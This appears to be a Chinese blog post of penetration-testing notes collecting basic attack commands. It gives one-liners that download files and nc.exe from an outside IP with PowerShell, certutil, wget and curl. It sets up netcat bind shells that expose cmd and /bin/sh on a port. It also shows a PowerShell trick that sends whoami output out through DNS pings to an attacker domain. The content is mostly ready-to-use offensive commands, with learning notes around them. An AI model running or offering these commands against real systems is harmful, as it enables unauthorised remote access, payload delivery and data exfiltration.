基本渗透命令

mikuku4个月前叽里咕噜小代码105

文件上传下载-解决无图形化-解决数据传输

Windows文件下载命令

pwershell:

powershell.exe -Command "Invoke-WebRequest -Uri http://121.43.143.58:80/ew.jpg -OutFile ew.png"

cmd:

certutil.exe -urlcache -split -f http://121.43.143.58:80/ew.jpg ew.png

linux文件下载命令

wget http://121.43.143.58:80/ew.jpg -O ew.png
curl http://121.43.143.58:80/ew.jpg -o ew.png

反弹SHELL命令-解决数据回显-解决数据通讯

正向连接:本地连接-等待监听

linux-控制->windows

/绑定cmd到5566端口

nc -e cmd -lvvp 5566

image.png

/主动连接目标5566

 ncat 121.43.143.58 5566

image.png

windows-控制->linux

/绑定sh到本地5566端口

 ncat -e /bin/sh -lvp 5566

image.png

/主动连接目标5566

nc 47.242.156.108 5566

反向连接

结果相同,不作过多赘述。


shell反弹:

1.首先判断操作系统

由于windows没有nc,我们可以利用漏洞上传到服务器

文件上传windows:

certutil.exe -urlcache -split -f http://121.43.143.58:80/nc.exe E:\\nc.exe

linux:

curl http://121.43.143.58:80/nc.exe -o nc.exe


已知漏洞:

数据不回显:
1.反弹shell

2.带外查询

cmd里无法使用whoami

用powershell变量赋值,把whoami执行结果给变量

结果带有“\”,导致ping无法执行,所以使用replace替换字符

powershell|| $x=whoami;$x=$x.replace('\','xxx');$y=.'某个地址';$z=$x+$y;ping $z

image.png

image.png





返回列表

上一篇:心脏

下一篇:基础入门

相关文章

红蓝队自动化项目部署和使用(好像完成了)

红蓝队自动化项目部署和使用(好像完成了)

耶!太好啦,是脚本小子,首先上连接All-Defense-Tool:红蓝队武器库ffffffff0x/f8x: 红/蓝队环境自动化部署工具首先介绍一下一个自动化网络空间工具Kento-Sec/Asam...

安全开发-web应用-JS-Nodejs

安全开发-web应用-JS-Nodejs

上期我们学习了关于原生开发的DOM树和学习了断点调试,又知道了关于dom-xss的漏洞捏,简单的利用了js调试来尝试加密数据包,好用捏今天我们来看看关于第三方库的使用什么事nodejs呢,他是运行在服...

web信息打点-完成了-但是没完成

web信息打点-完成了-但是没完成

这个专题只是简单的信息搜集,具体的漏洞利用到后面再讲js系列在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP,JAVA,NET等区别在于即没有...

安全开发-web应用-PHP-模版-RCE安全

安全开发-web应用-PHP-模版-RCE安全

叽里咕噜不多说,直接开干,这个新闻列表呢其实和前面留言板功能差不多,首先我们肯定是要用数据库来存储新闻数据,然后通过调用来让他显示在浏览器中,或者是给他添加id,让用户自己选择看哪个新闻,但是由此而来...

WEB攻防-XSS跨站注入(一)

WEB攻防-XSS跨站注入(一)

XSS跨站漏洞,这个漏洞的原理就是通过可控制的某些函数,植入payload然后用户通过访问到这个被攻击的地方触发了漏洞,然后就执行了一次攻击,听起来好像就没啥,这个漏洞确实也没啥,因为他大部分都是在前...

WEB攻防-PHP-文件上传(扩展篇-遗漏)

WEB攻防-PHP-文件上传(扩展篇-遗漏)

上期说完了原生态的文件上传漏洞,这期继续讲关于第三方中间件,编辑器,CMS的漏洞,虽然说基本没啥用哈,没准打CTF的时候用的上吧(自我安慰),这期并没有什么新知识点,更多的是对这个思路的扩展,因为关于...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。